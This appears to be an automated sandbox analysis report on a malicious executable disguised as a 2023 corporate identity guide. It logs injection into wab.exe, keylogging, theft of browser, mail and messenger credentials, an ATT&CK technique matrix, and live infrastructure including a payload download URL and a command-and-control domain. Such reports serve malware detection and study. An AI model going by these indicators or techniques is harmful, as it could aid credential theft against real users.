              Source: C:\Users\user\Desktop\DHRI_kurumsal_kimlik_rehberi-2023.exeCode function: 0_2_704D1B5F GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_704D1B5F
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 1_2_371C724E GetProcessHeap,1_2_371C724E
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 1_2_371C4AB4 mov eax, dword ptr fs:[00000030h]1_2_371C4AB4
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 1_2_371C2B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_371C2B1C
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 1_2_371C2639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_371C2639
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 1_2_371C60E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_371C60E2

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: C:\Users\user\Desktop\DHRI_kurumsal_kimlik_rehberi-2023.exeSection loaded: C:\Windows\SysWOW64\mshtml.dll target: C:\Program Files (x86)\Windows Mail\wab.exe protection: read writeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: unknown target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and writeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: unknown target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and writeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: unknown target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and writeJump to behavior
              Source: C:\Users\user\Desktop\DHRI_kurumsal_kimlik_rehberi-2023.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 2F70000Jump to behavior
              Source: C:\Users\user\Desktop\DHRI_kurumsal_kimlik_rehberi-2023.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 846008Jump to behavior
              Source: C:\Users\user\Desktop\DHRI_kurumsal_kimlik_rehberi-2023.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe C:\Users\user\Desktop\DHRI_kurumsal_kimlik_rehberi-2023.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\edvluJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\pxbdutmxlJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\rrgwvlxrzappJump to behavior
              Source: wab.exe, wab.exe, 00000001.00000002.5949539890.0000000000B1D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000001.00000002.5950608330.0000000000B24000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
              Source: wab.exe, 00000001.00000002.5949539890.0000000000B1D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager.ge#)Yy
              Source: wab.exe, 00000001.00000002.5949539890.0000000000B1D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerr|
              Source: wab.exe, 00000001.00000002.5949539890.0000000000B1D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerinutes }
              Source: wab.exe, 00000001.00000003.1197885709.0000000000B50000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000001.00000002.5950608330.0000000000B2B000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000001.00000003.1382395875.0000000000B2B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [2023/10/27 16:20:29 Program Manager]
              Source: wab.exe, 00000001.00000003.1382395875.0000000000B24000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerGZMy
              Source: wab.exe, 00000001.00000002.5949539890.0000000000B0B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [%04i/%02i/%02i %02i:%02i:%02i Program Manager]
              Source: wab.exe, 00000001.00000002.5950608330.0000000000B2B000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000001.00000003.1382395875.0000000000B2B000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000001.00000002.5949539890.0000000000B12000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
              Source: wab.exe, 00000001.00000003.1382395875.0000000000B24000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagereZ+y_
              Source: wab.exe, 00000001.00000002.5950608330.0000000000B24000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager6Z\yo
              Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\backgroundTaskHost.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\TargetedContentCache\v3\310091 VolumeInformationJump to behavior
              Source: C:\Windows\System32\backgroundTaskHost.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\TargetedContentCache\v3\310091\93fffb702eca4e37b606bf30419ce140_1 VolumeInformationJump to behavior
              Source: C:\Windows\System32\backgroundTaskHost.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\TargetedContentCache\v3\280815 VolumeInformationJump to behavior
              Source: C:\Windows\System32\backgroundTaskHost.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\TargetedContentCache\v3\280815\ca2cd4307a534aa3a7b05d1057f769f8_1 VolumeInformationJump to behavior
              Source: C:\Windows\System32\backgroundTaskHost.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\TargetedContentCache\v3\338389 VolumeInformationJump to behavior
              Source: C:\Windows\System32\backgroundTaskHost.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\TargetedContentCache\v3\338389\0f3da0446cf043f8ab3902f2b986d480_1 VolumeInformationJump to behavior
              Source: C:\Windows\System32\backgroundTaskHost.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\TargetedContentCache\v3\88000045 VolumeInformationJump to behavior
              Source: C:\Windows\System32\backgroundTaskHost.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\TargetedContentCache\v3\88000045\c0a8d0766ff9488c9eac5df41c8a7963_1 VolumeInformationJump to behavior
              Source: C:\Windows\System32\backgroundTaskHost.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\338388\1698416486 VolumeInformationJump to behavior
              Source: C:\Windows\System32\backgroundTaskHost.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\338387\1698416486 VolumeInformationJump to behavior
              Source: C:\Windows\System32\backgroundTaskHost.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\StagedAssets\b0454d15817320de552684d74d882dab2ca2413a50bd2d5f8e192b571acd9acc VolumeInformationJump to behavior
              Source: C:\Windows\System32\backgroundTaskHost.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\StagedAssets\2d8f1ee0594b0733d60f87f18c356edcbafb60793cbbf85ee5b53c05b94b98f9 VolumeInformationJump to behavior
              Source: C:\Windows\System32\backgroundTaskHost.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\StagedAssets\fe8047200d76309026e80bfa5727d99b7c89496fc0bc9fa6a0172bca48506afa VolumeInformationJump to behavior
              Source: C:\Windows\System32\backgroundTaskHost.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\StagedAssets\468083e795ff2e01e87d13d0a2c9fc398387f9033bfecf175932435e4c980362 VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 1_2_371C2933 cpuid 1_2_371C2933
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 1_2_371C2264 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,1_2_371C2264
              Source: C:\Users\user\Desktop\DHRI_kurumsal_kimlik_rehberi-2023.exeCode function: 0_2_0040338F EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040338F
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 5_2_00408043 memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy,5_2_00408043

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: 00000001.00000003.1382395875.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.5950608330.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: wab.exe PID: 8800, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Roaming\paqlgkfs.dat, type: DROPPED
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live MailJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: ESMTPPassword5_2_004033E2
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword5_2_00402DA5
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword5_2_00402DA5
              Source: Yara matchFile source: Process Memory Space: wab.exe PID: 8800, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: wab.exe PID: 9188, type: MEMORYSTR
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic SaltJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic SaltJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\PaltalkJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\places.sqliteJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\key4.dbJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: 00000001.00000003.1382395875.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.5950608330.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: wab.exe PID: 8800, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Roaming\paqlgkfs.dat, type: DROPPED
              Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
              Valid Accounts11
              Native API
              1
              DLL Side-Loading
              1
              DLL Side-Loading
              1
              Deobfuscate/Decode Files or Information
              1
              OS Credential Dumping
              1
              System Time Discovery
              Remote Services1
              Archive Collected Data
              Exfiltration Over Other Network Medium1
              Ingress Tool Transfer
              Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
              System Shutdown/Reboot
              Default Accounts2
              Command and Scripting Interpreter
              1
              Registry Run Keys / Startup Folder
              1
              Access Token Manipulation
              2
              Obfuscated Files or Information
              11
              Input Capture
              1
              Account Discovery
              Remote Desktop Protocol1
              Data from Local System
              Exfiltration Over Bluetooth1
              Encrypted Channel
              Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
              Domain AccountsAt (Linux)Logon Script (Windows)212
              Process Injection
              1
              DLL Side-Loading
              2
              Credentials in Registry
              2
              File and Directory Discovery
              SMB/Windows Admin Shares1
              Email Collection
              Automated Exfiltration1
              Non-Standard Port
              Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
              Local AccountsAt (Windows)Logon Script (Mac)1
              Registry Run Keys / Startup Folder
              1
              Masquerading
              1
              Credentials In Files
              28
              System Information Discovery
              Distributed Component Object Model11
              Input Capture
              Scheduled Transfer2
              Non-Application Layer Protocol
              SIM Card SwapCarrier Billing Fraud
              Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script2
              Virtualization/Sandbox Evasion
              LSA Secrets131
              Security Software Discovery
              SSH11
              Clipboard Data
              Data Transfer Size Limits112
              Application Layer Protocol
              Manipulate Device CommunicationManipulate App Store Rankings or Ratings
              Replication Through Removable MediaLaunchdRc.commonRc.common1
              Access Token Manipulation
              Cached Domain Credentials2
              Virtualization/Sandbox Evasion
              VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
              External Remote ServicesScheduled TaskStartup ItemsStartup Items212
              Process Injection
              DCSync4
              Process Discovery
              Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
              Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
              Application Window Discovery
              Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
              Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadow1
              System Owner/User Discovery
              Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1333307 Sample: DHRI_kurumsal_kimlik_rehber... Startdate: 27/10/2023 Architecture: WINDOWS Score: 100 32 ourt2949aslumes9.duckdns.org 2->32 34 gudanidevelopment.ge 2->34 36 geoplugin.net 2->36 50 Snort IDS alert for network traffic 2->50 52 Multi AV Scanner detection for domain / URL 2->52 54 Antivirus detection for dropped file 2->54 56 9 other signatures 2->56 8 DHRI_kurumsal_kimlik_rehberi-2023.exe 4 43 2->8         started        signatures3 process4 file5 26 C:\Users\user\AppData\Local\...\System.dll, PE32 8->26 dropped 58 Writes to foreign memory regions 8->58 60 Maps a DLL or memory area into another process 8->60 12 wab.exe 4 16 8->12         started        signatures6 process7 dnsIp8 38 94.156.6.253, 2402, 49746, 49747 NET1-ASBG Bulgaria 12->38 40 gudanidevelopment.ge 217.147.225.69, 49745, 80 GRENA-ASTbilisiGeorgiaGE Georgia 12->40 42 geoplugin.net 178.237.33.50, 49748, 80 ATOM86-ASATOM86NL Netherlands 12->42 28 C:\Users\user\AppData\Local\...\Retarded.exe, PE32 12->28 dropped 30 C:\Users\user\AppData\Roaming\paqlgkfs.dat, data 12->30 dropped 62 Maps a DLL or memory area into another process 12->62 64 Installs a global keyboard hook 12->64 17 wab.exe 1 12->17         started        20 wab.exe 1 12->20         started        22 wab.exe 2 12->22         started        24 backgroundTaskHost.exe 45 57 12->24         started        file9 signatures10 process11 signatures12 44 Tries to steal Instant Messenger accounts or passwords 17->44 46 Tries to harvest and steal browser information (history, passwords, etc) 17->46 48 Tries to steal Mail credentials (via file / registry access) 20->48

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              DHRI_kurumsal_kimlik_rehberi-2023.exe100%AviraHEUR/AGEN.1338455
              DHRI_kurumsal_kimlik_rehberi-2023.exe39%VirustotalBrowse
              DHRI_kurumsal_kimlik_rehberi-2023.exe26%ReversingLabs
              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Local\Temp\Atriocoelomic\Retarded.exe100%AviraHEUR/AGEN.1338455
              C:\Users\user\AppData\Local\Temp\Atriocoelomic\Retarded.exe26%ReversingLabs
              C:\Users\user\AppData\Local\Temp\Atriocoelomic\Retarded.exe39%VirustotalBrowse
              C:\Users\user\AppData\Local\Temp\nsa5F2F.tmp\System.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\nsa5F2F.tmp\System.dll0%VirustotalBrowse
              No Antivirus matches
              SourceDetectionScannerLabelLink
              gudanidevelopment.ge0%VirustotalBrowse
              geoplugin.net0%VirustotalBrowse
              ourt2949aslumes9.duckdns.org13%VirustotalBrowse
              SourceDetectionScannerLabelLink
              http://gudanidevelopment.ge/IogvoayYhe139.bin0%VirustotalBrowse
              https://go.microsoft.co0%Avira URL Cloudsafe
              https://2542116.fls.doublecli0%Avira URL Cloudsafe
              http://www.imvu.comr0%Avira URL Cloudsafe
              https://adservice.google.co.0%Avira URL Cloudsafe
              http://gudanidevelopment.ge/IogvoayYhe139.bin0%Avira URL Cloudsafe
              https://odc.offi0%Avira URL Cloudsafe
              https://go.microsoft.co1%VirustotalBrowse
              https://www.adobe.0%Avira URL Cloudsafe
              http://gudanidevelopment.ge/IogvoayYhe139.binSkorFiltathirchimie.com/IogvoayYhe139.bin0%Avira URL Cloudsafe
              http://gudanidevelopment.ge/IogvoayYhe139.bin9/Lx0%Avira URL Cloudsafe
              http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com0%Avira URL Cloudsafe
              https://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=3739368433491;gt0%Avira URL Cloudsafe
              http://gudanidevelopment.ge/IogvoayYhe139.bini(0%Avira URL Cloudsafe
              https://odc.officeap0%Avira URL Cloudsafe
              https://2542116.fls.double0%Avira URL Cloudsafe
              http://www.imvu.comata0%Avira URL Cloudsafe
              https://contextual.med0%Avira URL Cloudsafe
              https://capturemedia-assets.com/ig-bank/ad-engagement/startAnimation/main/index.html0%Avira URL Cloudsafe
              https://eb2.3lif0%Avira URL Cloudsafe
              https://get.a0%Avira URL Cloudsafe
              https://get3.adobe0%Avira URL Cloudsafe
              http://geoplugin.net/json.gp0%Avira URL Cloudsafe
              https://support.g0%Avira URL Cloudsafe
              https://capturemedia-assets.com/ig-bank/ad-engagement/startAnimation/main/index.html0%VirustotalBrowse
              http://geoplugin.net/json.gpsD0%Avira URL Cloudsafe
              http://geoplugin.net/json.gp4%VirustotalBrowse
              https://contextual.medi0%Avira URL Cloudsafe
              https://get3.adobe.co0%Avira URL Cloudsafe
              https://tpc.g0%Avira URL Cloudsafe
              http://www.ebuddy.com0%Avira URL Cloudsafe
              http://www.ebuddy.com0%VirustotalBrowse
              NameIPActiveMaliciousAntivirus DetectionReputation
              gudanidevelopment.ge
              217.147.225.69
              truetrueunknown
              geoplugin.net
              178.237.33.50
              truefalseunknown
              ourt2949aslumes9.duckdns.org
              unknown
              unknowntrueunknown
              NameMaliciousAntivirus DetectionReputation
              http://gudanidevelopment.ge/IogvoayYhe139.bintrue
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              http://geoplugin.net/json.gpfalse
              • 4%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              NameSourceMaliciousAntivirus DetectionReputation
              https://2542116.fls.doublecliwab.exe, 00000004.00000003.1188749590.00000000047FC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.1188822284.00000000047FC000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://servedby.flashtalking.com/imp/8/106228;3700839;201;jsiframe;Adobe;1000x463DESKTOPACROBATREADwab.exe, 00000004.00000003.1181692997.00000000047F1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.1179010846.0000000004FE6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.1180065246.0000000004FE6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.1179846071.0000000004FE6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.1178960196.00000000047FD000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.1179767675.0000000004FE6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.1179921984.0000000004FE6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.1180010165.0000000004FE6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.1180941360.0000000004FE6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.1180881677.0000000004FE6000.00000004.00000020.00020000.00000000.sdmpfalse
                high
                https://adservice.google.co.wab.exe, 00000004.00000003.1188749590.00000000047FC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.1188822284.00000000047FC000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://odc.offiwab.exe, 00000004.00000003.1188749590.00000000047FC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.1188822284.00000000047FC000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://www.imvu.comrwab.exe, 00000001.00000002.5979330195.0000000037190000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000006.00000002.1158713515.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://googleads.g.doubleclick.net/pagead/drt/s?v=r20120211wab.exe, 00000004.00000003.1188749590.00000000047FC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.1188822284.00000000047FC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.1181692997.00000000047F1000.00000004.00000020.00020000.00000000.sdmpfalse
                  high
                  https://eb2.3lift.com/syncwab.exe, 00000004.00000003.1188749590.00000000047FC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.1188822284.00000000047FC000.00000004.00000020.00020000.00000000.sdmpfalse
                    high
                    https://go.microsoft.cowab.exe, 00000004.00000003.1188822284.00000000047FC000.00000004.00000020.00020000.00000000.sdmpfalse
                    • 1%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    unknown
                    http://gudanidevelopment.ge/IogvoayYhe139.bin9/Lxwab.exe, 00000001.00000002.5949539890.0000000000B1D000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://contextual.media.net/checkwab.exe, 00000004.00000003.1188749590.00000000047FC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.1188822284.00000000047FC000.00000004.00000020.00020000.00000000.sdmpfalse
                      high
                      https://www.msn.com/de-ch/https://wab.exe, 00000004.00000003.1188749590.00000000047FC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.1188822284.00000000047FC000.00000004.00000020.00020000.00000000.sdmpfalse
                        high
                        http://gudanidevelopment.ge/IogvoayYhe139.binSkorFiltathirchimie.com/IogvoayYhe139.binwab.exe, 00000001.00000002.5965888002.0000000006BA0000.00000004.00001000.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://eb2.3lift.com/sync?wab.exe, 00000004.00000003.1181692997.00000000047F1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.1177800976.0000000004FE1000.00000004.00000020.00020000.00000000.sdmpfalse
                          high
                          https://support.google.com/chrome/?p=plugin_flashwab.exe, 00000004.00000003.1191404293.0000000004806000.00000004.00000020.00020000.00000000.sdmpfalse
                            high
                            https://www.adobe.wab.exe, 00000004.00000003.1192222584.0000000004804000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.1192004868.0000000004803000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.1192041280.0000000004803000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.1193463144.0000000004804000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.1192662040.0000000004804000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000002.1196559113.0000000004805000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://googleads.g.doubleclick.net/pageawab.exe, 00000004.00000003.1188749590.00000000047FC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.1188822284.00000000047FC000.00000004.00000020.00020000.00000000.sdmpfalse
                              high
                              https://www.msn.com/?ocid=iewab.exe, 00000004.00000003.1188749590.00000000047FC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.1188822284.00000000047FC000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                http://www.nirsoft.netwab.exe, 00000004.00000002.1195537784.00000000005C3000.00000004.00000010.00020000.00000000.sdmpfalse
                                  high
                                  http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.comwab.exe, 00000001.00000002.5979330195.0000000037190000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000006.00000002.1158713515.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://www.google.com/recaptcha/api2/aframewab.exe, 00000004.00000003.1181692997.00000000047F1000.00000004.00000020.00020000.00000000.sdmpfalse
                                    high
                                    https://www.google.com/chrome/wab.exe, 00000004.00000003.1181692997.00000000047F1000.00000004.00000020.00020000.00000000.sdmpfalse
                                      high
                                      https://www.google.comwab.exe, wab.exe, 00000006.00000002.1158713515.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                        high
                                        https://www.google.com/recaptcha/apiwab.exe, 00000004.00000003.1188749590.00000000047FC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.1188822284.00000000047FC000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
